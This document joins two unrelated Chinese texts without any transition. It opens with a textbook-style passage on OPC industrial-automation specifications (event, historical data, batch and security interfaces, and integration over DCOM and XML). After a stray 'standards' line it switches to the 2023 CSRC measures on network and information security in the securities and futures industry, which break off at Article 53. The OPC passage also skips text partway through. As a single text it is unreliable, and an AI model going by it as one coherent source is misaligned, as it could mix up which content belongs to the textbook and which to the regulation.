OPC事件服务器对象是服务器程序暴露的主要对象。OPC客户可以通过该对象的IOPCEventServer接口查询服务器提供的事件类别和参数,对状态进行管理。任何支持IOPCEventServer接口的COM对象都可作为OPC事件服务器,因此可以通过在OPC数据存取服务器中增加OPC事件服务器对象来发挥双重作用,当客户程序指定某个需要得到通知的特定事件时,它通过OPC事件服务器对象创建事件预定对象。一个客户可以指定多个事件,因此可以创建多个对象。事件预定对象允许客户程序设置OPC通知事件的各种属性,例如过滤条件。当客户程序指定事件发生时,该对象通过其IConnectionPiontContainer接口建立起与客户方的连接,并调用客户方的IOPCEventSink接口,将事件通知客户。OPC事件区域浏览对象是一个可选对象,也是由OPC事件服务器对象创建,它主要为客户程序提供一种浏览服务器中生产过程区域的方法。在实际生产过程中,往往将现场设备有组织地分为不同区域,由不同的操作者负责相关操作。这样,当不同客户需要得到事件通知时,它首先可以浏览服务器中设定的生产过程区域,然后再设置相应的过滤属性,将不属于自己职权范围内的事件过滤掉。某些简单事件服务器程序有可能不能实现该可选对象,也不提供相应的功能。4.OPC历史数据存取规范OPC历史数据存取规范(HistoricalDataAccessSpecification)提供一种通用的历史数据引擎,可以向感兴趣的用户和客户程序提供额外的数据信息。目前大多数历史数据系统采用专用接口分发数据,这样无法在即插即用的环境中增加或使用已有的历史数据解决方案,限制了其应用的范围和功能。OPC历史数据存取规范将历史信息看成某种类型的数据,用统一的标准把不同应用层次的数据集成起来。根据支持接口功能的不同,历史数据服务器可分为多种,目前OPC规范主要支持简单趋势数据服务器和复合数据压缩与分析服务器两种。前一种历史数据服务器只提供简单的原始数据存储功能,比较典型的是将OPC数据存取服务器提供的数据以时间、数值、品质多元组的形式存储。后一种服务器既可以存储原始数据,也可以进行数据压缩,同时还提供数据汇总和数据分析功能,例如计算平均值、最大值和最小值等。它还支持数据刷新和历史记录更新,此外,在保存实际历史数据的同时还可以保存相应的注释信息。OPC对象和接口:由于历史数据和实时数据不同,历史数据存取规范只定义了历史服务器对象(OPCHDAServerObject)和历史浏览器对象(OPCHDABrowerObject)。图10⁃9示意了这两个对象及其定制接口,该规范同时还定义了与客户程序方相应的回调函数接口。历史数据服务器对象提供了同步和异步存取历史数据的方法,客户程序可以调用相应的接口对历史数据库进行数据的查询、修改、插入、替换和删除等操作,具体的历史数据类型以及这些操作的内部实现过程则完全由服务器供应商决定。历史数据浏览器对象为客户程序提供了浏览历史数据地址空间的方法,它通过历史数据服务器对象的IOPCHDA_Server接口创建。历史服务器中数据的地址空间可分为层次型和扁平型,可以方便客户程序快速地找到需要进行操作的历史数据。可应用于大型的历史数据库是该对象特别重要的一个作用。5.OPC批量过程规范OPC批量过程规范(OPCBatchSpecification)是基于OPC数据存取规范和IEC61512⁃1国际批量控制规范标准(对应的美国标准为ISA⁃88)制定的,它提供了一种存取实时批量数据和设备信息的方法。该规范的目的不是为批量过程控制提供某种解决方案,而是使异构计算环境下不同的生产控制方案能有效地协同工作。如图10⁃10所示,一个批量过程服务器可以从其他OPC数据存取服务器或专用的批量过程控制软件获得数据,然后提供给客户软件。模型和控制模型等信息。(2)OPC对象与接口OPC批量过程服务器是在数据存取服务器对象上增加IOPCBatch⁃Server、IEnumOPCBatchSummary和IOPCEnumerationSets接口扩展而来的,因此必须实现数据存取服务器对象中所有的必选接口。客户程序可以通过新增的接口了解批量生产过程的进行、等待、完成情况及相关现场信息。由于服务器采用了只读的名称空间,所以客户程序中不能任意地为OPC数据项命名,必须遵循国际标准。6.OPC安全性规范OPC服务器为应用提供了重要的现场数据,如果这些参数被误修改将会产生无法预料的后果,因此需要防止未授权的操作。OPC安全性规范(SecuritySpecification)就提供了这样一种专门的机制来保护这些敏感数据。安全性规范采用与WindowsNT安全模型兼容的安全性参考模型,该模型包括访问主体、访问标识、安全对象、参考监视器、访问通道和安全控制列表等部分。OPC服务器中数据的安全机制是通过在OPC服务器对象上增加IOPCSecurityNT和IOPCSecurityPrivate可选接口来实现的。IOPCSecurityNT接口采用WindowsNT安全认证进行访问控制,即客户使用WindowsNT的访问标识(AccessToken)获得对OPC对象的访问权限,并由操作系统进行验证;IOPC⁃SecurityPrivate接口则采用专用的安全认证,客户需要获得由OPC服务器指定的访问标识才能对OPC对象进行访问,验证过程也是由OPC服务器对象作为参考监视器实现的。这两个接口实现了不同层次的安全性,任何需要安全认证的OPC服务器应至少实现一个接口,但若要允许没有WindowsNT访问标识的客户进行访问,则两个接口都必须实现。和其他可选接口一样,OPC客户程序应通过接口查询来检测OPC服务器实现的安全功能。OPC安全性规范重点在客户安全认证方面,但没有规定哪些对象需要设置安全性,而是将这些问题留给OPC服务器的供应商来决定。该规范和以前的OPC应用程序保持兼容,允许有多个安全级别,并且增加了安全性能。10.2.2基于OPC技术的系统级集成方法OPC技术是实现控制系统现场设备与过程管理信息进行交互,实现控制系统开放性的关键技术,同时它也为不同现场总线系统的集成提供了有效的软件实现手段。OPC以OLE/COM机制作为应用程序级的通信标准,采用客户/服务器(Client/Server)模式,把开发访问接口的任务放在硬件生产厂家或第三方厂家,以Server的形式提供给Cli⁃ent,并规定了一系列的接口标准,由Client负责创建Server的对象及访问Server支持的接口,从而把硬件生产厂商与软件开发人员有效地分离开来。OPC客户可以与几个OPC服务器通信,多个OPC客户也可以同时与一个OPC服务器交互。因此,针对不同的现场总线的开发应用的OPC服务器,通过连接这些针对不同现场总线的OPC服务器,应用软件(OPC客户)就可以从不同的现场总线系统读取数据,实现不同现场总线系统之间的通信和交互。图10⁃12给出了DeviceNet、PROFIBUS现场总线系统采用OPC技术集成的结构示意图。这种做法具有简单易行、工程开发量小的优点。但是它也存在明显的缺点:总线系统中节点间的通信比较慢,而且必须由应用软件来管理;另外,应用软件必须连接多个不同的服务器;更为严重的是,它的实时性差,功能的实现依赖于上位机,未能体现现场总线控制功能分散的优点。 10.3OPC应用示例 1.不同控制网段之间的数据交换现场总线技术发展至今仍然是多种总线共存的局面,这使系统集成和异种控制网段之间的数据交换面临许多困难。采用网关等硬件接口卡实现异种总线段之间的物理连接被称为硬件解决方案。这需要开发不同总线之间的接口网关,而且只要其中任意一种总线协议升级,连接该总线和其他几种总线的多种网关就要相应地升级。借助OPC技术可以形成软件解决方案,如图10⁃13所示。如果每种总线段都提供各自的OPC服务器,那么任何OPC客户端软件都可以通过一致的OPC接口访问这些OPC服务器,从而获取各个总线段的数据。所有总线段的信息都可以集中到一个客户端软件,并由这个客户端软件充当信息的集散地。例如,可以通过OPC服务器1从FF总线段读取到数据a,然后再将数据a通过OPC服务器2写到PROFIBUS总线段。通过这种方法可以实现异种总线段之间的信息交互。此外,如果其中某种总线作了升级,只需要相应地升级负责访问该总线段的OPC服务器,其他OPC服务器不需要做任何改动。 2.利用OPC连接FCS、DCS与PLCOPC除了能连接异种控制网段之外,还可以连接不同类型的控制系统与设备。图10⁃14描述了自动化系统中利用OPC的客户服务器体系结构,为来自不同供应商的设备、系统提供即插即用的功能。图中通过OPC连接了传统的离散I/O系统、广泛应用的DCS和PLC系统以及现场总线控制系统FCS。底层设备信息通过OPC服务器进入上一层的人机界面(HMI)和SCADA。这些系统与最上层的质量控制软件、生产管理软件和Internet应用软件再通过OPC接口互换信息,从而使信息能够在各个系统之间充分流动。 3.利用OPC增强系统的可扩展性如果系统具备OPC的应用条件,则当现有系统需要添加新设备时,只需将新设备接入系统,安装用于访问该设备的OPC服务器,扩展后的系统便可正常工作。新设备的添加并不影响系统其他部分的运行和使用。图10⁃15表明了利用OPC实现系统扩展的简单示例,可以看到,采用OPC技术可以增强系统的可扩展性,使系统的扩展更为简单。同样,也可以利用OPC在原有控制系统的基础上增加一个新的控制系统。这两个控制系统可以是同种类型,也可以是不同类型,它们通过OPC连接成一个更大的控制系统。扩展后的控制系统内部各个子系统之间可以采用OPC互相传递数据,实现无缝的信息集成。 4.利用OPC访问监控软件的专有数据库在实际应用中,许多监控软件都采用专有的实时数据库或历史数据库。对这类数据库的访问不像访问通用数据库那么容易,只能通过调用API函数或其他一些特殊方式。不同数据库的API函数是不一样的,包括它的函数名、需要传递的参数类型和个数等。这就带来和硬件驱动器开发类似的问题:要访问不同监控软件的专有数据库,需要编写不同的代码,而且还要分别了解各个数据库提供的API函数的调用方法,这显然是十分烦琐的。采用OPC能有效地避免这些问题。如果监控软件专有数据库的开发商在提供数据库的同时,也能提供一个可以访问该数据库的OPC服务器(见图10⁃16),通常是数据访问服务器(DataAccess,DA)或历史数据访问服务器(HistoryDataAccess,HAD),那么当有用户要访问这个工厂数据库时,只需要按照OPC规范的要求编写OPC客户端程序,而无须了解该专有数据库特定的接口要求。更重要的是,只要这些数据库提供了OPCDA或HDA服务器,这个OPC客户端程序就能够用来访问不同的数据库。5.OPC与仿真功能和控制软件的连接当没有连接实际的现场设备时,OPC服务器可以提供仿真功能。它可以仿真简单的信号发生器,通过仿真获得某个设备或过程的运行数据,这时候OPC服务器不再从外部设备和应用(例如数据库)读写数据,而是直接与服务器内部用于实现仿真功能的仿真函数进行数据交互。当OPC客户请求“写”数据时,OPC服务器就通过参数传递的方式将数据“写”到仿真函数;当OPC客户请求“读”过程变量时,OPC服务器则从仿真函数处得到被控量的当前仿真值,并回传给客户。所有这些都可以通过OPC服务器的编程实现。无论是用于仿真还是用于连接真正的设备,OPC客户与OPC服务器的交互方式都是一致的。如图10⁃17所示,当OPC用于连接各种控制算法软件时,控制算法软件作为OPC客户,从OPC服务器获得需要的数值,经过控制算法运算后,再将控制输出传递给OPC服务器。将OPC用于先进控制也是为了解决不同的控制软件与不同的仪表、装置和其应用软件之间的数据交换问题,同样可避免接口的重复开发,使数据的交互更为畅通。 6.互联网上的OPC前面已经介绍过,OPC的服务器和客户可以跨网络分布在不同的计算机内,即利用OPC可以实现跨网络的数据交换。OPC提供两种在Internet和Intranet上交换数据的方案:OPC⁃DCOM和OPC⁃XML。OPC⁃DCOM大都用在局域网内部,而OPC⁃XML可以完成跨越防火墙的数据交互。下面简要介绍采用OPC⁃DCOM和OPC⁃XML在互联网上进行信息交互的解决方案。(1)OPC⁃DCOM方案图10⁃18是采用OPC⁃DCOM实现在互联网上进行信息交互的一个实例。如图10-18所示,网络上的一台笔记本式计算机要利用IE(InternetExplorer)实时地从A公司的OPC服务器(称为OPC服务器A)和B公司的OPC服务器(称为OPC服务器B)中读取数据。假设OPC服务器A和OPC服务器B运行在不同的计算机上,并且这些计算机的操作系统都是WindowsNT。 以下简要分析一下这个系统的数据传递情况。在客户端计算机的IE浏览器中运行着一个ActiveX控件,它充当OPC客户的角色。ActiveX控件通过OPC自动化接口从OPC服务器获得数据,然后将所得数据以适当的方式显示给IE用户。由于OPC客户和服务器之间的通信是通过OPC自动化接口进行的,所以需要经过自动化接口封装。自动化接口封装实际上通过一个DLL程序,把OPC服务器的自定义接口封装成自动化接口,不同公司的OPC服务器有各自的DLL接口封装程序。当ActiveX控件要访问A公司的OPC服务器时,就载入A公司的DLL接口封装程序;当要访问的是B公司的OPC服务器时,则载入B公司的DLL接口封装程序。OPC客户与服务器端的通信对COM编程人员是透明的,具体过程由客户和服务器端的代理来完成。其中,客户端的代理称为Proxy,服务器端的代理称为Stub。代理实际上也是一个DLL程序,它由OLE/COM生成。客户端代理(Proxy)和OPC客户程序位于同一个进程内。当客户调用服务器的接口函数时,客户端代理接管要传递给该函数的所有参数,并将这些参数打包成32位的数据结构,然后生成某种远程处理调用RPC,并发送到OPC服务器所在的机器(或进程)中。在OPC服务器端也有一个代理(Stub),这个代理和服务器属于同一个进程,它保存着指向服务器对象的真实指针。当Stub接收到Proxy发送过来的RPC请求后,首先将打包后的数据结构解包,然后将解包后得到的函数调用参数压入堆栈,最后调用服务器对象中的接口函数。等到函数执行完毕返回后,Stub又将函数返回值和输出参数打包发送给Proxy,Proxy再将信息解包,然后回传给OPC客户。这个打包、解包和传递的过程对OPC服务器和客户来说都是透明的,它们可以像调用同一进程内的对象那样调用本地(在同一台计算机,但是不同进程内)和远程(在不同计算机内)对象,具体的实现过程由COM/DCOM负责完成。通常当OPC客户和服务器位于同一计算机内时,采用COM已经可以完成通信,但本例中客户和服务器应用位于网络上的不同计算机内,因此需要借助DCOM技术。Web浏览器中的ActiveX控件通过自动化接口封装和COM/DCOM提供的代理机制就可以访问到A公司或B公司的OPC服务器,然后将获得的信息在浏览器上以网页的形式显示给客户。OPC⁃DCOM也存在一些不足。首先是并非所有的操作系统都支持COM/DCOM,例如UNIX等非Windows平台就不支持COM,因此,运行在不支持COM/DCOM操作系统中的应用就无法通过OPC⁃DCOM来访问OPC服务器。如果图10⁃18所示系统中浏览器是安装在UNIX操作系统下,它就无法访问A公司或B公司的OPC服务器,因而也就无法显示它们的信息。另外,DCOM在分布式组件对象之间进行通信时所用的传输方式是RPC,而目前Inter⁃net上应用最广泛的传输协议是超文本传输协议(HypertextTransferProtocol,HTTP)。HTTP在设计时没有考虑到RPC,因此调用RPC在Internet上不易被接收。此外将RPC用在Inter⁃net上还会遇到安全性问题,因为防火墙和代理服务器通常都会拒绝RPC类型的通信,所以如果在图10⁃18所示系统的OPC服务器端设置防火墙,OPC⁃DCOM方案就无法实现数据的正常通信。通常,企业为了防止企业网外部的用户攻击内部系统或窃取机密数据,都会在企业内部的Internet和外部的Internet之间设置防火墙。因此,OPC⁃DCOM方案在应用中受到限制。为了解决上述两个问题,OPC基金会成立了OPC⁃XML工作组,将XML技术用于OPC,使得OPC技术应用到更广泛的领域,并且发挥出更大的作用。(2)OPC⁃XML方案如果为基于COM/DCOM的OPC服务器和客户加上XML特性,使它们之间的通信不再采用常规的COM/DCOM方案,就可以有效地解决OPC技术在Internet上应用时所碰到的安全性等问题。图10⁃19所示为OPC⁃XML方案示意图。 在OPC⁃XML方案中,客户和服务器之间的通信不通过RPC,而是采用HTTP(或Inter⁃net上的其他传输协议)来传递XML文件。XML文件中包含了诸如调用的接口函数名、传递的参数类型和数值、函数调用的返回值等信息。XML和HTML一样都是与平台无关的标记语言。就像任何操作系统都能支持HTML文件一样,所有操作系统都可以浏览XML文件。这就使OPC技术可以扩展到所有操作系统上,而不仅仅限于Windows系统。尽管UNIX系统并不支持COM/DCOM,但UNIX操作系统下的Web浏览器仍然可以通过XML文件和OPC服务器交换信息,从而使OPC服务器的数据能够进入非Windows系统。此外,XML/HTTP的传输文件一般不会被防火墙过滤掉,因此,防火墙之外的OPC客户端也能够通过XML/HTTP访问位于防火墙之内的OPC服务器。从安全性的角度考虑,大多数情况下的OPC服务器都位于防火墙之内,因此采用OPC⁃XML方案在应用中更具有普适性。
standards
证券期货业网络和信息安全管理办法 (2023 年 1 月 17 日中国证券监督管理委员会第 1 次委务会议 审议通过) 第一章 总 则 第一条 为了保障证券期货业网络和信息安全,保护投资者 合法权益,促进证券期货业稳定健康发展,根据《中华人民共和 国证券法》(以下简称《证券法》)、《中华人民共和国期货和衍生 品法》(以下简称《期货和衍生品法》)、《中华人民共和国证券投 资基金法》(以下简称《证券投资基金法》)、《中华人民共和国网 络安全法》(以下简称《网络安全法》)、《中华人民共和国数据安 全法》《中华人民共和国个人信息保护法》(以下简称《个人信息 保护法》)、 《关键信息基础设施安全保护条例》等法律法规,制定 本办法。 第二条 核心机构和经营机构在中华人民共和国境内建设、 运营、维护、使用网络及信息系统,信息技术系统服务机构为证 券期货业务活动提供产品或者服务的网络和信息安全保障,以及 证券期货业网络和信息安全的监督管理,适用本办法。 — 1 — 第三条 核心机构和经营机构应当遵循保障安全、促进发展 的原则,建立健全网络和信息安全防护体系,提升安全保障水平, 确保与信息化工作同步推进,促进本机构相关工作稳妥健康发展。 信息技术系统服务机构应当遵循技术安全、服务合规的原则, 为证券期货业务活动提供产品或者服务,与核心机构、经营机构 共同保障行业网络和信息安全,促进行业信息化发展。 第四条 核心机构和经营机构应当依法履行网络和信息安全 保护义务,对本机构网络和信息安全负责,相关责任不因其他机 构提供产品或者服务进行转移或者减轻。 信息技术系统服务机构应当勤勉尽责,对提供产品或者服务 的安全性、合规性承担责任。 第五条 中国证监会依法履行以下监督管理职责: (一)组织制定并推动落实证券期货业网络和信息安全发展 规划、监管规则和行业标准; (二)负责证券期货业网络和信息安全的监督管理,按规定 做好证券期货业涉及的关键信息基础设施安全保护工作; (三)负责证券期货业网络和信息安全重大技术路线、重大 科技项目管理; (四)组织开展证券期货业投资者个人信息保护工作; (五)负责证券期货业网络安全应急演练、应急处置、事件 报告与调查处理; (六)指导证券期货业网络和信息安全促进与发展; — 2 — (七)支持、协助国家有关部门组织实施网络和信息安全相 关法律、行政法规; (八)法律法规规定的其他网络和信息安全监管职责。 第六条 中国证监会建立集中管理、分级负责的证券期货业 网络和信息安全监督管理体制。中国证监会科技监管部门对证券 期货业网络和信息安全实施监督管理。中国证监会履行监管职责 的其他部门配合开展相关工作。 中国证监会派出机构对本辖区经营机构和信息技术系统服务 机构网络和信息安全实施日常监管。 第七条 中国证券业协会、中国期货业协会、中国证券投资 基金业协会等行业协会(以下统称行业协会)依法制定行业网络 和信息安全自律规则,对经营机构网络和信息安全实施自律管理。 第八条 核心机构依法制定保障市场相关主体与本机构信息 系统安全互联的技术规则,对与本机构信息系统和网络通信设施 相关联主体加强指导,督促其强化网络和信息安全管理,保障相 关信息系统和网络通信设施的安全平稳运行。 第二章 网络和信息安全运行 第九条 核心机构和经营机构应当具有完善的信息技术治理 架构,健全网络和信息安全管理制度体系,建立内部决策、管理、 执行和监督机制,确保网络和信息安全管理能力与业务活动规模、 — 3 — 复杂程度相匹配。 信息技术系统服务机构应当建立网络和信息安全管理制度, 配备相应的安全、合规管理人员,建立与提供产品或者服务相适 应的网络和信息安全管理机制。 第十条 核心机构和经营机构应当明确主要负责人为本机构 网络和信息安全工作的第一责任人,分管网络和信息安全工作的 领导班子成员或者高级管理人员为直接责任人。 核心机构和经营机构应当建立网络和信息安全工作协调和决 策机制,保障第一责任人和直接责任人履行职责。 第十一条 核心机构和经营机构应当指定或者设立网络和信 息安全工作牵头部门或者机构,负责管理重要信息系统和相关基 础设施、制定网络安全应急预案、组织应急演练等工作。 第十二条 核心机构和经营机构应当保障人员和资金投入与 业务活动规模、复杂程度相适应,确保网络和信息安全人员具备 与履行职责相匹配的专业知识和职业技能。 第十三条 核心机构和经营机构应当确保信息系统和相关基 础设施具备合理的架构,足够的性能、容量、可靠性、扩展性和 安全性,并保证相关安全技术措施与信息化工作同步规划、同步 建设、同步使用。 第十四条 核心机构和经营机构应当落实网络安全等级保护 制度,依法履行网络安全等级保护义务,按照国家和证券期货业 网络安全等级保护相关要求,开展网络和信息系统定级备案、等 — 4 — 级测评和安全建设等工作。 核心机构和经营机构应当按照相关要求,将网络安全等级保 护工作开展情况报送中国证监会及其派出机构。 第十五条 核心机构和经营机构新建上线、运行变更、下线 移除重要信息系统的,应当充分评估技术和业务风险,制定风险 防控措施、应急处置和回退方案,并对相关结果进行复核验证; 可能对证券期货市场安全平稳运行产生较大影响的,应当提前向 中国证监会及其派出机构报告。 核心机构和经营机构不得在交易时段对重要信息系统进行变 更,重要信息系统存在故障、缺陷,经评估须进行紧急修复的情 形除外。 第十六条 核心机构和经营机构在重要信息系统上线、变更 前应当制定全面的测试方案,持续完善测试用例和测试数据,并 保障测试的有效执行。 除必须使用敏感数据的情形外,核心机构和经营机构应当对 测试环境涉及的敏感数据进行脱敏,对未脱敏数据须采取与生产 环境同等的安全控制措施。 核心机构交易、行情、开户、结算、通信等重要信息系统上 线或者进行重大升级变更时,应当组织市场相关主体进行联网测 试。 第十七条 核心机构和经营机构暂停或者终止借助网络向投 资者提供服务前,应当履行告知义务,合理选取公告、定向通知 — 5 — 等方式告知投资者相关业务影响情况、替代方式及应对措施。 第十八条 核心机构和经营机构应当建立健全网络和信息安 全监测预警机制,设定监测指标,持续监测信息系统和相关基础 设施的运行状况,及时处置异常情形,对监测机制执行效果进行 定期评估并持续优化。 核心机构和经营机构应当全面、准确记录并妥善保存生产运 营过程中的业务日志和系统日志,确保满足故障分析、内部控制、 调查取证等工作的需要。重要信息系统业务日志应当保存五年以 上,系统日志应当保存六个月以上。 第十九条 核心机构和经营机构应当构建网络和信息安全防 护体系,综合采取网络隔离、用户认证、访问控制、策略管理、 数据加密、网站防篡改、病毒木马防范、非法入侵检测和网络安 全态势感知等安全保障措施,提升网络和信息安全防护能力,及 时识别、阻断相关网络攻击,保护重要信息系统和相关基础设施, 防范信息泄露与损毁。 第二十条 核心机构和经营机构应当建立本地、同城和异地 数据备份设施,重要信息系统应当每天至少备份数据一次,每季 度至少对数据备份进行一次有效性验证。 核心机构和经营机构应当建立重要信息系统的故障备份设施 和灾难备份设施,根据信息系统的重要程度和业务影响情况,确 定恢复目标,保证业务连续运行。灾难备份设施应当通过同城或 者异地灾难备份中心的形式体现。 — 6 — 核心机构和经营机构采取双活或者多活架构部署重要信息系 统的,在确保业务连续运行的前提下,任一数据中心可视为其他 数据中心的灾难备份设施。 第二十一条 核心机构和经营机构应当每年至少开展一次重 要信息系统压力测试;发现市场较大波动,重要信息系统的性能 容量可能无法保障安全平稳运行的,应当及时对相关信息系统开 展压力测试。 核心机构和经营机构应当依照有关行业标准,根据系统技术 特点和承载业务类型,制定压力测试方案,设定测试场景,从系 统性能、网络负载、灾备建设等方面设置测试指标,有序组织测 试工作,测试完成后形成压力测试报告存档备查,并保存五年以 上。 核心机构和经营机构重要信息系统的性能容量应当在历史峰 值的两倍以上。核心机构交易时段相关网络近一年使用峰值应当 在当前带宽的百分之五十以下,经营机构交易时段相关网络近一 年使用峰值应当在当前带宽的百分之八十以下。 第二十二条 核心机构和经营机构应当建立健全供应商管理 机制,明确信息技术产品和服务准入标准,审慎采购并持续评估 相关产品和服务的质量,及时改进风险管理措施,健全应急处置 机制,确保重要信息系统运行安全可控。 核心机构和经营机构应当与供应商签订合同及保密协议,明 确约定各方保障网络和信息安全的权利和义务;在使用供应商提 — 7 — 供产品或者服务时引发网络安全事件的,相关供应商有义务配合 中国证监会及其派出机构查明网络安全事件原因,认定网络安全 事件责任。 第二十三条 供应商为核心机构和经营机构提供重要信息系 统相关产品或者服务的,应当依法作为信息技术系统服务机构向 中国证监会备案。 核心机构和经营机构应当督促相关信息技术系统服务机构依 法履行备案义务。 第二十四条 任何机构和个人不得违规开展证券期货业信息 系统认证、检测、风险评估等活动,不得违规发布证券期货业信 息安全漏洞、计算机病毒、网络攻击、网络侵入等信息。 第二十五条 核心机构和经营机构应当建立信息发布审核机 制,加强对本机构和本机构运营平台发布信息的管理,发现违反 法律法规和有关监管规定的,应当立即停止发布传输,采取必要 的处置措施,防止信息扩散,积极消除负面影响,并及时向中国 证监会及其派出机构报告。 第二十六条 核心机构应当对交易、行情、开户、结算、风 控、通信等重要信息系统具有自主开发能力,掌握执行程序和源 代码并安全可靠存放。 经营机构应当根据自身发展需要,加强自主研发能力建设, 持续提升自主可控能力。 核心机构和经营机构应当按照国家及中国证监会有关要求, — 8 — 开展信息技术应用创新以及商用密码应用相关工作。 第二十七条 中国证监会可以委托相关机构建设证券期货业 备份数据中心,开展行业数据的集中备份和管理工作,并采取有 效安全防护手段,防范数据损毁泄露风险,持续提升证券期货业 重大灾难应对能力。 鼓励证券期货业关键信息基础设施运营者及时向证券期货业 备份数据中心备份数据。其他核心机构和经营机构可以结合经营 需要,自主选择证券期货业备份数据中心,开展数据级灾难备份 工作。 第二十八条 核心机构和经营机构应当按照知识产权相关法 律法规,制定知识产权保护策略和制度,不侵犯他人的知识产权, 并采取有效措施保护本机构自主知识产权。 第三章 投资者个人信息保护 第二十九条 核心机构和经营机构应当遵循合法、正当、必 要和诚信原则,处理投资者个人信息,规范投资者个人信息处理 行为,履行投资者个人信息保护义务,不得损害投资者合法权益。 第三十条 核心机构和经营机构处理投资者个人信息,应当 建立健全投资者个人信息保护体系,明确相关岗位及职责要求, 建立健全投资者个人信息处理、安全防护、应急处置、审计监督 等管理机制,加强投资者个人信息保护。 — 9 — 第三十一条 核心机构和经营机构应当按照法律法规的规定 及合同的约定处理投资者个人信息,明确告知投资者处理个人信 息的目的、方式、范围和隐私保护政策,不得超范围收集和使用 投资者个人信息,不得收集提供服务非必要的投资者个人信息。 合同约定事项应当基于从事证券期货业务活动的必要限度。 核心机构和经营机构不得以投资者不同意处理其个人信息或 者撤回同意为由,拒绝向投资者提供服务,为投资者提供服务所 必需、履行法定职责或者法定义务等情形除外。 第三十二条 核心机构和经营机构处理投资者个人信息时, 应当确保个人信息在收集、存储、使用、加工、传输、提供、公 开、删除等处理过程中的合规、安全,防止个人信息的泄露、篡 改、丢失。 第三十三条 核心机构和经营机构应当依法依规向第三方机 构提供投资者个人信息,明确告知投资者个人信息处理目的、处 理方式、个人信息种类、保存期限、保护措施以及相关方的权利 和义务等,并取得投资者个人单独同意,履行法定职责或者法定 义务的情形除外。 第三十四条 核心机构和经营机构在本机构网络安全防护边 界以外处理投资者个人信息的,应当采取数据脱敏、数据加密等 措施,防范化解投资者个人信息在处理过程中的泄露风险。 核心机构和经营机构通过短信、邮件等非自主运营渠道发送 投资者敏感个人信息的,应当将投资者账号信息、身份证号码等 — 10 — 敏感个人信息进行脱敏处理。 第三十五条 核心机构和经营机构利用生物特征进行客户身 份认证的,应当对其必要性、安全性进行风险评估,不得将人脸、 步态、指纹、虹膜、声纹等生物特征作为唯一的客户身份认证方 式,强制客户同意收集其个人生物特征信息。 第四章 网络和信息安全应急处置 第三十六条 核心机构、经营机构和信息技术系统服务机构 发现网络和信息安全产品或者服务存在安全缺陷、安全漏洞等风 险隐患的,应当及时核实并加固整改;可能对证券期货业网络和 信息安全平稳运行产生较大影响的,应当向中国证监会及其派出 机构报告。 第三十七条 核心机构和经营机构应当根据业务影响分析情 况,建立健全网络安全应急预案,明确应急目标、应急组织和处 置流程,应急场景应当覆盖网络安全事件、自然灾害和公共卫生 事件、本机构网络和信息安全相关重大人事变动、主要信息技术 系统服务机构退出等情形。 第三十八条 核心机构应当组织与本机构信息系统和网络通 信设施相关联主体开展网络安全应急演练,每年至少开展一次, 并于演练后 15 个工作日内将相关情况报告中国证监会。 核心机构和经营机构应当定期开展网络安全应急演练,并形 — 11 — 成应急演练报告存档备查。 第三十九条 核心机构和经营机构应当建立应急处置机制, 及时处置网络安全事件,尽快恢复信息系统正常运行,保护事件 现场和相关证据,向中国证监会及其派出机构进行应急报告,不 得瞒报、谎报、迟报、漏报。 信息技术系统服务机构应当协助开展信息系统故障排查、修 复等工作,并及时告知使用同类产品或者服务的核心机构和经营 机构,配合开展风险排查和整改工作。 第四十条 核心机构和经营机构应当配合中国证监会及其派 出机构对网络安全事件进行调查处理,及时组织内部调查,完成 问题整改,认定追究事件责任,并按照有关规定报告中国证监会 及其派出机构。 第四十一条 核心机构和经营机构发生网络安全事件,对投 资者造成影响的,应当及时通过官方网站、客户交易终端、电话 或者邮件等有效渠道通知相关方可以采取的替代方式或者应急措 施,提示相关方防范和应对可能出现的风险。 第五章 关键信息基础设施安全保护 第四十二条 证券期货业关键信息基础设施运营者应当按照 法律法规及中国证监会有关规定,强化安全管理措施、技术防护 及其他必要手段,保障经费投入,确保关键信息基础设施安全稳 — 12 — 定运行,维护数据的完整性、保密性和可用性。 第四十三条 证券期货业关键信息基础设施运营者应当将关 键信息基础设施安全保护情况纳入网络和信息安全工作第一责任 人、直接责任人和相关人员的责任考核机制。 第四十四条 证券期货业关键信息基础设施运营者应当指定 专门机构或者部门负责关键信息基础设施安全保护管理工作,为 每个关键信息基础设施指定网络和信息安全管理责任人,依法认 定网络安全关键岗位,配备充足的网络和信息安全人员,并对专 门安全管理机构负责人和关键岗位人员进行安全背景审查。 第四十五条 证券期货业关键信息基础设施运营者新建承载 关键业务的重要网络设施、信息系统等,投入使用前应当按照关 键信息基础设施安全保护相关要求开展安全检测和风险评估,检 测评估通过后上线运行。 证券期货业关键信息基础设施运营者对关键信息基础设施实 施运行变更或者下线移除,可能对证券期货市场安全平稳运行产 生较大影响的,应当在遵守本办法第十五条的前提下,组织开展 专家评审;未通过评审的,原则上不得实施运行变更、下线移除 等操作。 证券期货业关键信息基础设施停止运营或者发生较大变化, 可能影响认定结果的,相关运营者应当及时将相关情况报告中国 证监会及其派出机构。 第四十六条 证券期货业关键信息基础设施运营者应当每年 — 13 — 至少进行一次网络和信息安全检测和风险评估,对发现的安全问 题及时整改,网络和信息安全检测和风险评估的内容包括但不限 于:关键信息基础设施的运行情况、面临的主要威胁、风险管理 情况、应急处置情况等。 第四十七条 证券期货业关键信息基础设施运营者采购网络 产品或者服务的,应当按照国家网络安全审查制度要求开展风险 预判工作;采购网络产品或者服务与关键信息基础设施密切相关, 投入使用后可能影响国家安全的,应当及时申报网络安全审查。 第四十八条 证券期货业关键信息基础设施运营者应当对关 键信息基础设施的安全运行进行持续监测,定期开展压力测试, 发现系统性能和网络容量不足的,应当及时采取系统升级、扩容 等处置措施,确保系统性能容量在历史峰值的三倍以上,交易时 段相关网络带宽应当在近一年使用峰值的两倍以上。 第四十九条 证券期货业关键信息基础设施运营者应当在符 合本办法第二十条规定的基础上,建设同城和异地灾难备份中心, 实现数据同步保存。 第六章 网络和信息安全促进与发展 第五十条 鼓励核心机构、经营机构和信息技术系统服务机 构在依法合规的前提下,积极开展网络和信息安全技术应用工作, 运用新技术提升网络和信息安全保障水平。 — 14 — 第五十一条 核心机构和经营机构组织开展行业信息基础设 施建设的,应当在保障本机构网络和信息安全的前提下,为行业 统筹提供服务,提升信息技术资源利用和服务水平。 第五十二条 核心机构和经营机构参加资本市场金融科技创 新机制的,应当遵守有关规定,在依法合规、风险可控的前提下, 有序开展金融科技创新与应用,借助新型信息技术手段,提升本 机构证券期货业务活动的运行质量和效能。 信息技术系统服务机构参加资本市场金融科技创新机制的, 应当遵守有关规定,持续优化技术服务水平,增强安全合规管理 能力。 第五十三条 核心机构可以申请开展证券期货业网络和信息 